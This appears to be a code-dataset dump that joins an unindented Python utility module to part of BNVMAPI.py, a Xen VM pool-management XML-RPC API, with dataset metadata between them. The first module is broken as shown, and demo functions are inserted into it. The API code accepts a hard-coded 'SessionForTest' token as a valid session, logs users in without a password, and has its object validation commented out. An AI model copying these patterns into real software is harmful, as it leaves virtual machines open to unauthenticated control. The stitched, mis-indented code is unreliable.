def write_atomic(filepath, data, mode=0o644, ignore_fail=False):
try:
fd, filepath_tmp = mkstemp(prefix=os.path.basename(filepath) + ".tmp.", dir=os.path.dirname(filepath))
os.fchmod(fd, mode)
with os.fdopen(fd, "wb") as f:
f.write(data)
os.rename(filepath_tmp, filepath)
except (IOError, OSError):
if not ignore_fail:
raise
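# Hypothetical usage: the temp file is renamed into place, so readers observe
# either the complete new content or the old file, never a partial write.
def _demo_write_atomic():
    import tempfile
    path = os.path.join(tempfile.mkdtemp(), 'state.yaml')
    write_atomic(path, yaml_dump({'jobs': 4}).encode('UTF-8'))
    with open(path, 'rb') as f:
        assert yaml_load(f) == {'jobs': 4}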
def isatty(fd):
return hasattr(fd, "isatty") and fd.isatty()
_cached_terminal_size = None
def get_terminal_size():
global _cached_terminal_size
if _cached_terminal_size is not None:
return _cached_terminal_size
try:
with open(os.ctermid(), "rb") as f:
cr = struct.unpack('hh', fcntl.ioctl(f.fileno(), termios.TIOCGWINSZ, '1234'))
except (IOError, struct.error):
raise OSError("Cannot determine terminal size")
_cached_terminal_size = int(cr[1]), int(cr[0])
return _cached_terminal_size
def find_program(program):
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
fpath = path.strip('"')
candidate = os.path.join(fpath, fname)
if is_exe(candidate):
return candidate
return None
def getmtime(path):
return os.path.getmtime(path) if os.path.exists(path) else 0
def call_process(args, bufsize=0, stdin=None, stdout=None, stderr=None, cwd=None, env=None, input_data=None):
p = Popen(args, bufsize=bufsize, stdin=stdin, stdout=stdout, stderr=stderr, cwd=cwd, env=env)
if stdin == PIPE or stdout == PIPE or stderr == PIPE:
stdoutdata, stderrdata = p.communicate(input_data.encode("UTF-8") if input_data else None)
return p.returncode, stdoutdata.decode("UTF-8") if stdoutdata is not None else None, stderrdata.decode("UTF-8") if stderrdata is not None else None
else:
p.wait()
return p.returncode
def create_multiprocess_manager():
return multiprocessing.Manager()
def _worker_init(worker_init, worker_init_args):
signal.signal(signal.SIGINT, signal.SIG_IGN)
if worker_init is not None:
worker_init(*worker_init_args)
def run_multiprocess_workers(worker, workload, worker_init=None, worker_init_args=(), jobs=None, timeout=None):
if not workload:
return []
if timeout is None:
timeout = 999999999 # Workaround for KeyboardInterrupt
pool = multiprocessing.Pool(processes=jobs, initializer=_worker_init, initargs=(worker_init, worker_init_args))
try:
result_obj = pool.map_async(worker, workload)
pool.close()
result = result_obj.get(timeout=timeout)
return result
except:
pool.terminate()
raise
finally:
pool.join()
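# Hypothetical sketch: workers must be module-level functions so the pool can
# pickle them; results come back in workload order.
def _demo_square(n):
    return n * n
def _demo_multiprocess():
    assert run_multiprocess_workers(_demo_square, [1, 2, 3], jobs=2) == [1, 4, 9]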
|
apache-2.0
| 8,527,631,097,278,525,000
| 28.131455
| 155
| 0.652538
| false
| 3.645711
| false
| false
| false
|
Hearen/OnceServer
|
pool_management/bn-xend-core/xend/BNVMAPI.py
|
1
|
374814
|
import traceback
import inspect
import os
import Queue
import string
import sys
import threading
import time
import xmlrpclib
import socket
import struct
import copy
import re
import XendDomain, XendDomainInfo, XendNode, XendDmesg, XendConfig
import XendLogging, XendTaskManager, XendAPIStore, XendIOController
from xen.xend.BNPoolAPI import BNPoolAPI
from xen.util.xmlrpcclient import ServerProxy
from xen.xend import uuid as genuuid
from XendLogging import log
from XendNetwork import XendNetwork
from XendError import *
from XendTask import XendTask
from xen.util import ip as getip
from xen.util import Netctl
from xen.xend import sxp
from xen.xend.XendCPUPool import XendCPUPool
from XendAuthSessions import instance as auth_manager
from xen.util.xmlrpclib2 import stringify
from xen.util import xsconstants
from xen.util.xpopen import xPopen3
from xen.xend.XendConstants import DOM_STATE_HALTED, DOM_STATE_PAUSED
from xen.xend.XendConstants import DOM_STATE_RUNNING, DOM_STATE_SUSPENDED
from xen.xend.XendConstants import DOM_STATE_SHUTDOWN, DOM_STATE_UNKNOWN
from xen.xend.XendConstants import DOM_STATE_CRASHED, HVM_PARAM_ACPI_S_STATE
from xen.xend.XendConstants import VDI_DEFAULT_STRUCT, VDI_DEFAULT_SR_TYPE, VDI_DEFAULT_DIR
from xen.xend.XendConstants import FAKE_MEDIA_PATH, FAKE_MEDIA_NAME
from xen.xend.XendConstants import CD_VBD_DEFAULT_STRUCT, DEFAULT_HA_PATH
from xen.xend.XendConstants import CACHED_CONFIG_FILE
from XendAPIConstants import *
from xen.xend.ConfigUtil import getConfigVar
GB = 1024 * 1024 * 1024
if getConfigVar('compute', 'VM', 'disk_limit'):
DISK_LIMIT = int(getConfigVar('compute', 'VM', 'disk_limit'))
else:
DISK_LIMIT = 6
if getConfigVar('compute', 'VM', 'interface_limit'):
INTERFACE_LIMIT = int(getConfigVar('compute', 'VM', 'interface_limit'))
else:
INTERFACE_LIMIT = 6
if getConfigVar('virtualization', 'DOM0', 'reserved_mem_gb'):
RESERVED_MEM = int(getConfigVar('virtualization', 'DOM0', 'reserved_mem_gb')) * GB
else:
RESERVED_MEM = 4 * GB
try:
set
except NameError:
from sets import Set as set
reload(sys)
sys.setdefaultencoding( "utf-8" )
DOM0_UUID = "00000000-0000-0000-0000-000000000000"
argcounts = {}
def doexec(args, inputtext=None):
"""Execute a subprocess, then return its return code, stdout and stderr"""
proc = xPopen3(args, True)
if inputtext != None:
proc.tochild.write(inputtext)
stdout = proc.fromchild
stderr = proc.childerr
rc = proc.wait()
return (rc, stdout, stderr)
# ------------------------------------------
# Utility Methods for Xen API Implementation
# ------------------------------------------
def xen_api_success(value):
"""Wraps a return value in XenAPI format."""
if value is None:
s = ''
else:
s = stringify(value)
return {"Status": "Success", "Value": s}
def xen_api_success_void():
"""Return success, but caller expects no return value."""
return xen_api_success("")
def xen_api_error(error):
"""Wraps an error value in XenAPI format."""
if type(error) == tuple:
error = list(error)
if type(error) != list:
error = [error]
if len(error) == 0:
error = ['INTERNAL_ERROR', 'Empty list given to xen_api_error']
return { "Status": "Failure",
"ErrorDescription": [str(x) for x in error] }
def xen_rpc_call(ip, method, *args):
"""wrap rpc call to a remote host"""
try:
if not ip:
return xen_api_error("Invalid ip for rpc call")
# create
proxy = ServerProxy("http://" + ip + ":9363/")
# login
response = proxy.session.login('root')
if cmp(response['Status'], 'Failure') == 0:
log.exception(response['ErrorDescription'])
return xen_api_error(response['ErrorDescription'])
session_ref = response['Value']
        # execute
method_parts = method.split('_')
method_class = method_parts[0]
method_name = '_'.join(method_parts[1:])
if method.find("host_metrics") == 0:
method_class = "host_metrics"
method_name = '_'.join(method_parts[2:])
#log.debug(method_class)
#log.debug(method_name)
if method_class.find("Async") == 0:
method_class = method_class.split(".")[1]
response = proxy.__getattr__("Async").__getattr__(method_class).__getattr__(method_name)(session_ref, *args)
else:
response = proxy.__getattr__(method_class).__getattr__(method_name)(session_ref, *args)
if cmp(response['Status'], 'Failure') == 0:
log.exception(response['ErrorDescription'])
return xen_api_error(response['ErrorDescription'])
# result
return response
except socket.error:
return xen_api_error('socket error')
def xen_api_todo():
"""Temporary method to make sure we track down all the TODOs"""
return {"Status": "Error", "ErrorDescription": XEND_ERROR_TODO}
def now():
return datetime()
def datetime(when = None):
"""Marshall the given time as a Xen-API DateTime.
@param when The time in question, given as seconds since the epoch, UTC.
May be None, in which case the current time is used.
"""
if when is None:
return xmlrpclib.DateTime(time.gmtime())
else:
return xmlrpclib.DateTime(time.gmtime(when))
# -----------------------------
# Bridge to Legacy XM API calls
# -----------------------------
def do_vm_func(fn_name, vm_ref, *args, **kwargs):
"""Helper wrapper func to abstract away from repetitive code.
@param fn_name: function name for XendDomain instance
@type fn_name: string
@param vm_ref: vm_ref
@type vm_ref: string
@param *args: more arguments
@type *args: tuple
"""
try:
xendom = XendDomain.instance()
fn = getattr(xendom, fn_name)
xendom.do_legacy_api_with_uuid(fn, vm_ref, *args, **kwargs)
return xen_api_success_void()
except VMBadState, exn:
return xen_api_error(['VM_BAD_POWER_STATE', vm_ref, exn.expected,
exn.actual])
# ---------------------------------------------------
# Event dispatch
# ---------------------------------------------------
EVENT_QUEUE_LENGTH = 50
event_registrations = {}
def event_register(session, reg_classes):
if session not in event_registrations:
event_registrations[session] = {
'classes' : set(),
'queue' : Queue.Queue(EVENT_QUEUE_LENGTH),
'next-id' : 1
}
if not reg_classes:
reg_classes = classes
sessionclasses = event_registrations[session]['classes']
if hasattr(sessionclasses, 'union_update'):
sessionclasses.union_update(reg_classes)
else:
sessionclasses.update(reg_classes)
def event_unregister(session, unreg_classes):
if session not in event_registrations:
return
if unreg_classes:
event_registrations[session]['classes'].intersection_update(
unreg_classes)
if len(event_registrations[session]['classes']) == 0:
del event_registrations[session]
else:
del event_registrations[session]
def event_next(session):
if session not in event_registrations:
return xen_api_error(['SESSION_NOT_REGISTERED', session])
queue = event_registrations[session]['queue']
events = [queue.get()]
try:
while True:
events.append(queue.get(False))
except Queue.Empty:
pass
return xen_api_success(events)
def _ctor_event_dispatch(xenapi, ctor, api_cls, session, args):
result = ctor(xenapi, session, *args)
if result['Status'] == 'Success':
ref = result['Value']
event_dispatch('add', api_cls, ref, '')
return result
def _dtor_event_dispatch(xenapi, dtor, api_cls, session, ref, args):
result = dtor(xenapi, session, ref, *args)
if result['Status'] == 'Success':
event_dispatch('del', api_cls, ref, '')
return result
def _setter_event_dispatch(xenapi, setter, api_cls, attr_name, session, ref,
args):
result = setter(xenapi, session, ref, *args)
if result['Status'] == 'Success':
event_dispatch('mod', api_cls, ref, attr_name)
return result
def event_dispatch(operation, api_cls, ref, attr_name):
assert operation in ['add', 'del', 'mod']
event = {
'timestamp' : now(),
'class' : api_cls,
'operation' : operation,
'ref' : ref,
'obj_uuid' : ref,
'field' : attr_name,
}
for reg in event_registrations.values():
if api_cls in reg['classes']:
event['id'] = reg['next-id']
reg['next-id'] += 1
reg['queue'].put(event)
# ---------------------------------------------------
# Python Method Decorators for input value validation
# ---------------------------------------------------
def trace(func, api_name=''):
"""Decorator to trace XMLRPC Xen API methods.
@param func: function with any parameters
@param api_name: name of the api call for debugging.
"""
if hasattr(func, 'api'):
api_name = func.api
def trace_func(self, *args, **kwargs):
log.debug('%s: %s' % (api_name, args))
return func(self, *args, **kwargs)
trace_func.api = api_name
return trace_func
def catch_typeerror(func):
"""Decorator to catch any TypeErrors and translate them into Xen-API
errors.
@param func: function with params: (self, ...)
@rtype: callable object
"""
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except TypeError, exn:
#log.exception('catch_typeerror')
if hasattr(func, 'api') and func.api in argcounts:
# Assume that if the argument count was wrong and if the
# exception was thrown inside this file, then it is due to an
# invalid call from the client, otherwise it's an internal
# error (which will be handled further up).
expected = argcounts[func.api]
actual = len(args) + len(kwargs)
if expected != actual:
tb = sys.exc_info()[2]
try:
sourcefile = traceback.extract_tb(tb)[-1][0]
if sourcefile == inspect.getsourcefile(BNVMAPI):
return xen_api_error(
['MESSAGE_PARAMETER_COUNT_MISMATCH',
func.api, expected, actual])
finally:
del tb
raise
except XendAPIError, exn:
return xen_api_error(exn.get_api_error())
return f
def session_required(func):
"""Decorator to verify if session is valid before calling method.
@param func: function with params: (self, session, ...)
@rtype: callable object
"""
def check_session(self, session, *args, **kwargs):
if auth_manager().is_session_valid(session) or cmp(session, "SessionForTest") == 0:
return func(self, session, *args, **kwargs)
else:
return xen_api_error(['SESSION_INVALID', session])
return check_session
def _is_valid_ref(ref, validator):
return type(ref) == str and validator(ref)
def _check_ref(validator, clas, func, api, session, ref, *args, **kwargs):
# if _is_valid_ref(ref, validator):
return func(api, session, ref, *args, **kwargs)
# else:
# return xen_api_error(['HANDLE_INVALID', clas, ref])
def _check_vm(validator, clas, func, api, session, ref, *args, **kwargs):
# for host_ref in BNPoolAPI._host_structs.keys():
# if BNPoolAPI._host_structs[host_ref]['VMs'].has_key(ref):
if BNPoolAPI.check_vm(ref):
return func(api, session, ref, *args, **kwargs)
return xen_api_error(['VM_NOT_FOUND', clas, ref])
def _check_console(validator, clas, func, api, session, ref, *args, **kwargs):
#if BNPoolAPI._consoles_to_VM.has_key(ref):
return func(api, session, ref, *args, **kwargs)
#else:
return xen_api_error(['HANDLE_INVALID', clas, ref])
def valid_object(class_name):
"""Decorator to verify if object is valid before calling
method.
    @param func: function with params: (self, session, ref)
@rtype: callable object
"""
return lambda func: \
lambda *args, **kwargs: \
_check_ref(lambda r: \
XendAPIStore.get(r, class_name) is not None,
class_name, func, *args, **kwargs)
def valid_task(func):
"""Decorator to verify if task_ref is valid before calling
method.
@param func: function with params: (self, session, task_ref)
@rtype: callable object
"""
return lambda *args, **kwargs: \
_check_ref(XendTaskManager.get_task,
'task', func, *args, **kwargs)
def valid_vm(func):
"""Decorator to verify if vm_ref is valid before calling method.
@param func: function with params: (self, session, vm_ref, ...)
@rtype: callable object
"""
return lambda * args, **kwargs: \
_check_vm(XendDomain.instance().is_valid_vm,
'VM', func, *args, **kwargs)
def valid_vbd(func):
"""Decorator to verify if vbd_ref is valid before calling method.
@param func: function with params: (self, session, vbd_ref, ...)
@rtype: callable object
"""
return lambda *args, **kwargs: \
_check_ref(lambda r: XendDomain.instance().is_valid_dev('vbd', r),
'VBD', func, *args, **kwargs)
def valid_vbd_metrics(func):
"""Decorator to verify if ref is valid before calling method.
@param func: function with params: (self, session, ref, ...)
@rtype: callable object
"""
return lambda *args, **kwargs: \
_check_ref(lambda r: XendDomain.instance().is_valid_dev('vbd', r),
'VBD_metrics', func, *args, **kwargs)
def valid_vif(func):
"""Decorator to verify if vif_ref is valid before calling method.
@param func: function with params: (self, session, vif_ref, ...)
@rtype: callable object
"""
return lambda *args, **kwargs: \
_check_ref(lambda r: XendDomain.instance().is_valid_dev('vif', r),
'VIF', func, *args, **kwargs)
def valid_vif_metrics(func):
"""Decorator to verify if ref is valid before calling method.
@param func: function with params: (self, session, ref, ...)
@rtype: callable object
"""
return lambda *args, **kwargs: \
_check_ref(lambda r: XendDomain.instance().is_valid_dev('vif', r),
'VIF_metrics', func, *args, **kwargs)
def valid_console(func):
"""Decorator to verify if console_ref is valid before calling method.
@param func: function with params: (self, session, console_ref, ...)
@rtype: callable object
"""
return lambda * args, **kwargs: \
_check_console(lambda r: XendDomain.instance().is_valid_dev('console',
r),
'console', func, *args, **kwargs)
classes = {
'session' : None,
'VM' : valid_vm,
'VBD' : valid_vbd,
'VBD_metrics' : valid_vbd_metrics,
'VIF' : valid_vif,
'VIF_metrics' : valid_vif_metrics,
'console' : valid_console,
'task' : valid_task,
}
def singleton(cls, *args, **kw):
instances = {}
def _singleton(*args, **kw):
if cls not in instances:
instances[cls] = cls(*args, **kw)
return instances[cls]
return _singleton
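# Hypothetical sketch: the singleton decorator caches one instance per class.
def _demo_singleton():
    @singleton
    class _Once(object):
        pass
    assert _Once() is _Once()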
@singleton
class BNVMAPI(object):
__decorated__ = False
__init_lock__ = threading.Lock()
__vm_clone_lock__ = threading.Lock()
__vm_change_host_lock__ = threading.Lock()
__set_passwd_lock__ = threading.Lock()
__vbd_lock__ = threading.Lock()
def __new__(cls, *args, **kwds):
""" Override __new__ to decorate the class only once.
Lock to make sure the classes are not decorated twice.
"""
cls.__init_lock__.acquire()
try:
if not cls.__decorated__:
cls._decorate()
cls.__decorated__ = True
return object.__new__(cls, *args, **kwds)
finally:
cls.__init_lock__.release()
def _decorate(cls):
""" Decorate all the object methods to have validators
and appropriate function attributes.
This should only be executed once for the duration of the
server.
"""
global_validators = [session_required, catch_typeerror]
        # Cheat methods
# -------------
# Methods that have a trivial implementation for all classes.
# 1. get_by_uuid == getting by ref, so just return uuid for
# all get_by_uuid() methods.
for api_cls in classes.keys():
# We'll let the autoplug classes implement these functions
# themselves - its much cleaner to do it in the base class
get_by_uuid = '%s_get_by_uuid' % api_cls
get_uuid = '%s_get_uuid' % api_cls
get_all_records = '%s_get_all_records' % api_cls
def _get_by_uuid(_1, _2, ref):
return xen_api_success(ref)
def _get_uuid(_1, _2, ref):
return xen_api_success(ref)
def unpack(v):
return v.get('Value')
def _get_all_records(_api_cls):
return lambda s, session: \
xen_api_success(dict([(ref, unpack(getattr(cls, '%s_get_record' % _api_cls)(s, session, ref)))\
for ref in unpack(getattr(cls, '%s_get_all' % _api_cls)(s, session))]))
setattr(cls, get_by_uuid, _get_by_uuid)
setattr(cls, get_uuid, _get_uuid)
setattr(cls, get_all_records, _get_all_records(api_cls))
# Autoplugging classes
# --------------------
# These have all of their methods grabbed out from the implementation
# class, and wrapped up to be compatible with the Xen-API.
def getter(ref, type):
return XendAPIStore.get(ref, type)
def wrap_method(name, new_f):
try:
f = getattr(cls, name)
                wrapped_f = (lambda *args: new_f(f, *args))
wrapped_f.api = f.api
wrapped_f.async = f.async
setattr(cls, name, wrapped_f)
except AttributeError:
# Logged below (API call: %s not found)
pass
def setter_event_wrapper(api_cls, attr_name):
setter_name = '%s_set_%s' % (api_cls, attr_name)
wrap_method(
setter_name,
lambda setter, s, session, ref, *args:
_setter_event_dispatch(s, setter, api_cls, attr_name,
session, ref, args))
def ctor_event_wrapper(api_cls):
ctor_name = '%s_create' % api_cls
wrap_method(
ctor_name,
lambda ctor, s, session, *args:
_ctor_event_dispatch(s, ctor, api_cls, session, args))
def dtor_event_wrapper(api_cls):
dtor_name = '%s_destroy' % api_cls
wrap_method(
dtor_name,
lambda dtor, s, session, ref, *args:
_dtor_event_dispatch(s, dtor, api_cls, session, ref, args))
# Wrapping validators around XMLRPC calls
# ---------------------------------------
for api_cls, validator in classes.items():
def doit(n, takes_instance, async_support=False,
return_type=None):
n_ = n.replace('.', '_')
try:
f = getattr(cls, n_)
if n not in argcounts:
argcounts[n] = f.func_code.co_argcount - 1
validators = takes_instance and validator and \
[validator] or []
validators += global_validators
for v in validators:
f = v(f)
f.api = n
f.async = async_support
if return_type:
f.return_type = return_type
setattr(cls, n_, f)
except AttributeError:
log.warn("API call: %s not found" % n)
ro_attrs = getattr(cls, '%s_attr_ro' % api_cls, []) \
+ cls.Base_attr_ro
rw_attrs = getattr(cls, '%s_attr_rw' % api_cls, []) \
+ cls.Base_attr_rw
methods = getattr(cls, '%s_methods' % api_cls, []) \
+ cls.Base_methods
funcs = getattr(cls, '%s_funcs' % api_cls, []) \
+ cls.Base_funcs
# wrap validators around readable class attributes
for attr_name in ro_attrs + rw_attrs:
doit('%s.get_%s' % (api_cls, attr_name), True,
async_support=False)
            # wrap validators around writable class attributes
for attr_name in rw_attrs:
doit('%s.set_%s' % (api_cls, attr_name), True,
async_support=False)
setter_event_wrapper(api_cls, attr_name)
# wrap validators around methods
for method_name, return_type in methods:
doit('%s.%s' % (api_cls, method_name), True,
async_support=True)
# wrap validators around class functions
for func_name, return_type in funcs:
doit('%s.%s' % (api_cls, func_name), False,
async_support=True,
return_type=return_type)
ctor_event_wrapper(api_cls)
dtor_event_wrapper(api_cls)
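        # Worked example (comment sketch): for api_cls 'VM', the ro attr
        # 'domid' makes doit('VM.get_domid', True) look up VM_get_domid,
        # wrap it in valid_vm plus the global validators (session_required,
        # catch_typeerror), and tag it with f.api = 'VM.get_domid'.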
_decorate = classmethod(_decorate)
def __init__(self, auth):
self.auth = auth
Base_attr_ro = ['uuid']
Base_attr_rw = ['name_label', 'name_description']
Base_methods = [('get_record', 'Struct')]
Base_funcs = [('get_all', 'Set'), ('get_by_uuid', None), ('get_all_records', 'Set')]
def _get_XendAPI_instance(self):
import XendAPI
return XendAPI.instance()
def _get_BNStorageAPI_instance(self):
import BNStorageAPI
return BNStorageAPI.instance()
# Xen API: Class Session
# ----------------------------------------------------------------
# NOTE: Left unwrapped by __init__
session_attr_ro = ['this_host', 'this_user', 'last_active']
session_methods = [('logout', None)]
def session_get_all(self, session):
return xen_api_success([session])
def session_login(self, username):
try:
session = auth_manager().login_unconditionally(username)
return xen_api_success(session)
except XendError, e:
return xen_api_error(['SESSION_AUTHENTICATION_FAILED'])
session_login.api = 'session.login'
def session_login_with_password(self, *args):
if not BNPoolAPI._isMaster and BNPoolAPI._inPool:
return xen_api_error(XEND_ERROR_HOST_IS_SLAVE)
if len(args) < 2:
return xen_api_error(
['MESSAGE_PARAMETER_COUNT_MISMATCH',
'session.login_with_password', 2, len(args)])
username = args[0]
password = args[1]
try:
# session = ((self.auth == AUTH_NONE and
# auth_manager().login_unconditionally(username)) or
# auth_manager().login_with_password(username, password))
session = auth_manager().login_with_password(username, password)
return xen_api_success(session)
except XendError, e:
return xen_api_error(['SESSION_AUTHENTICATION_FAILED'])
session_login_with_password.api = 'session.login_with_password'
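    # Illustrative client-side flow (comment sketch; the host name, password
    # and the 9363 port are assumptions taken from the commented example
    # further down this file):
    #   proxy = ServerProxy('http://master:9363')
    #   session_ref = proxy.session.login_with_password('root', 'pw')['Value']
    #   proxy.VM.get_all(session_ref)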
# object methods
def session_logout(self, session):
auth_manager().logout(session)
return xen_api_success_void()
def session_get_record(self, session, self_session):
if self_session != session:
return xen_api_error(['PERMISSION_DENIED'])
record = {'uuid' : session,
'this_host' : XendNode.instance().uuid,
'this_user' : auth_manager().get_user(session),
'last_active': now()}
return xen_api_success(record)
def session_get_uuid(self, session, self_session):
return xen_api_success(self_session)
def session_get_by_uuid(self, session, self_session):
return xen_api_success(self_session)
# attributes (ro)
def session_get_this_host(self, session, self_session):
if self_session != session:
return xen_api_error(['PERMISSION_DENIED'])
if not BNPoolAPI._isMaster and BNPoolAPI._inPool:
return xen_api_error(XEND_ERROR_HOST_IS_SLAVE)
return xen_api_success(XendNode.instance().uuid)
def session_get_this_user(self, session, self_session):
if self_session != session:
return xen_api_error(['PERMISSION_DENIED'])
user = auth_manager().get_user(session)
if user is not None:
return xen_api_success(user)
return xen_api_error(['SESSION_INVALID', session])
def session_get_last_active(self, session, self_session):
if self_session != session:
return xen_api_error(['PERMISSION_DENIED'])
return xen_api_success(now())
# Xen API: Class User
# ----------------------------------------------------------------
# Xen API: Class Tasks
# ----------------------------------------------------------------
task_attr_ro = ['name_label',
'name_description',
'status',
'progress',
'type',
'result',
'error_info',
'allowed_operations',
'session'
]
task_attr_rw = []
task_funcs = [('get_by_name_label', 'Set(task)'),
('cancel', None)]
def task_get_name_label(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.name_label)
def task_get_name_description(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.name_description)
def task_get_status(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.get_status())
def task_get_progress(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.progress)
def task_get_type(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.type)
def task_get_result(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.result)
def task_get_error_info(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.error_info)
def task_get_allowed_operations(self, session, task_ref):
return xen_api_success({})
def task_get_session(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.session)
def task_get_all(self, session):
tasks = XendTaskManager.get_all_tasks()
return xen_api_success(tasks)
def task_get_record(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
log.debug(task.get_record())
return xen_api_success(task.get_record())
def task_cancel(self, session, task_ref):
return xen_api_error('OPERATION_NOT_ALLOWED')
# def task_get_by_name_label(self, session, name):
# return xen_api_success(XendTaskManager.get_task_by_name(name))
# Xen API: Class VM
# ----------------------------------------------------------------
VM_attr_ro = ['power_state',
'resident_on',
'consoles',
'snapshots',
'VIFs',
'VBDs',
'VTPMs',
'DPCIs',
'DSCSIs',
'media',
'fibers',
'usb_scsi',
'DSCSI_HBAs',
'tools_version',
'domid',
'is_control_domain',
'metrics',
'crash_dumps',
'cpu_pool',
'cpu_qos',
'network_qos',
'VCPUs_CPU',
'ip_addr',
'MAC',
'is_local_vm',
'vnc_location',
'available_vbd_device',
'VIF_record',
'VBD_record',
'dev2path_list',
'pid2devnum_list',
'vbd2device_list',
'config',
'record_lite',
'inner_ip',
'system_VDI',
'network_record',
]
VM_attr_rw = ['name_label',
'name_description',
'user_version',
'is_a_template',
'auto_power_on',
'snapshot_policy',
'memory_dynamic_max',
'memory_dynamic_min',
'memory_static_max',
'memory_static_min',
'VCPUs_max',
'VCPUs_at_startup',
'VCPUs_params',
'actions_after_shutdown',
'actions_after_reboot',
'actions_after_suspend',
'actions_after_crash',
'PV_bootloader',
'PV_kernel',
'PV_ramdisk',
'PV_args',
'PV_bootloader_args',
'HVM_boot_policy',
'HVM_boot_params',
'platform',
'PCI_bus',
'other_config',
'security_label',
'pool_name',
'suspend_VDI',
'suspend_SR',
'VCPUs_affinity',
'tags',
'tag',
'rate',
'all_tag',
'all_rate',
'boot_order',
'IO_rate_limit',
# 'ip_map',
'passwd',
'config',
'platform_serial',
]
VM_methods = [('clone', 'VM'),
('clone_local', 'VM'),
('clone_MAC', 'VM'),
('clone_local_MAC', 'VM'),
('start', None),
('start_on', None),
('snapshot', None),
('rollback', None),
('destroy_snapshot', 'Bool'),
('destroy_all_snapshots', 'Bool'),
('pause', None),
('unpause', None),
('clean_shutdown', None),
('clean_reboot', None),
('hard_shutdown', None),
('hard_reboot', None),
('suspend', None),
('resume', None),
('send_sysrq', None),
('set_VCPUs_number_live', None),
('add_to_HVM_boot_params', None),
('remove_from_HVM_boot_params', None),
('add_to_VCPUs_params', None),
('add_to_VCPUs_params_live', None),
('remove_from_VCPUs_params', None),
('add_to_platform', None),
('remove_from_platform', None),
('add_to_other_config', None),
('remove_from_other_config', None),
('save', None),
('set_memory_dynamic_max_live', None),
('set_memory_dynamic_min_live', None),
('send_trigger', None),
('pool_migrate', None),
('migrate', None),
('destroy', None),
('cpu_pool_migrate', None),
('destroy_local', None),
('destroy_fiber', None),
('destroy_usb_scsi', None),
('destroy_media', None),
('destroy_VIF', None),
('disable_media', None),
('enable_media', None),
('eject_media', None),
('copy_sxp_to_nfs', None),
('media_change', None),
('add_tags', None),
('check_fibers_valid', 'Map'),
('check_usb_scsi_valid', 'Map'),
('can_start','Bool'),
('init_pid2devnum_list', None),
('clear_IO_rate_limit', None),
('clear_pid2devnum_list', None),
('start_set_IO_limit', None),
('start_init_pid2dev', None),
('create_image', 'Bool'),
('send_request_via_serial', 'Bool'),
# ('del_ip_map', None),
]
VM_funcs = [('create', 'VM'),
('create_on', 'VM'),
('create_from_sxp', 'VM'),
('create_from_vmstruct', 'VM'),
('restore', None),
('get_by_name_label', 'Set(VM)'),
('get_all_and_consoles', 'Map'),
('get_lost_vm_by_label', 'Map'),
('get_lost_vm_by_date', 'Map'),
('get_record_lite', 'Set'),
('create_data_VBD', 'Bool'),
('delete_data_VBD', 'Bool'),
('create_from_template', None),
('create_on_from_template', None),
('clone_system_VDI', 'VDI'),
('create_with_VDI', None),
]
# parameters required for _create()
VM_attr_inst = [
'name_label',
'name_description',
'user_version',
'is_a_template',
'is_local_vm',
'memory_static_max',
'memory_dynamic_max',
'memory_dynamic_min',
'memory_static_min',
'VCPUs_max',
'VCPUs_at_startup',
'VCPUs_params',
'actions_after_shutdown',
'actions_after_reboot',
'actions_after_suspend',
'actions_after_crash',
'PV_bootloader',
'PV_kernel',
'PV_ramdisk',
'PV_args',
'PV_bootloader_args',
'HVM_boot_policy',
'HVM_boot_params',
'platform',
'PCI_bus',
'other_config',
'security_label']
def VM_get(self, name, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM attribute value by name.
@param name: name of VM attribute field.
@param session: session of RPC.
@param vm_ref: uuid of VM.
@return: value of field.
@rtype: dict
'''
return xen_api_success(
XendDomain.instance().get_vm_by_uuid(vm_ref).info[name])
def VM_set(self, name, session, vm_ref, value):
'''
@author: wuyuewen
@summary: Set VM attribute value by name.
@param name: name of VM attribute field.
@param session: session of RPC.
@param vm_ref: uuid of VM.
@param value: new value of VM attribute field.
@return: True | False.
@rtype: dict
'''
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
dominfo.info[name] = value
return self._VM_save(dominfo)
def _VM_save(self, dominfo):
'''
@author: wuyuewen
        @summary: Call the config save function; the VM's config struct is saved to disk.
@param dominfo: VM config structure.
@return: True | False.
@rtype: dict.
'''
log.debug('VM_save')
XendDomain.instance().managed_config_save(dominfo)
return xen_api_success_void()
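    # Illustrative usage (comment sketch, assuming a valid session and VM
    # uuid): VM_set('name_description', session, vm_ref, 'demo box') writes
    # the field into dominfo.info and persists it via managed_config_save().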
# attributes (ro)
def VM_get_power_state(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM power state by uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@return: power state.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_power_state(vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_power_state", vm_ref)
else:
return self._VM_get_power_state(vm_ref)
def _VM_get_power_state(self, vm_ref):
'''
@author: wuyuewen
@summary: Internal method.
@param vm_ref: uuid.
@return: power state.
@rtype: dict.
'''
# log.debug("in get power state")
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_power_state())
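    # Note on the dispatch pattern above, which recurs throughout this
    # class: on the pool master, a call for a VM resident on another host
    # is forwarded to that host over XML-RPC (xen_rpc_call); otherwise the
    # local _VM_* implementation is invoked directly.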
# def VM_get_power_state(self, session, vm_ref):
# #host_ref = BNPoolAPI._VM_to_Host[vm_ref]
# host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
# if cmp(host_ref, XendNode.instance().uuid) == 0:
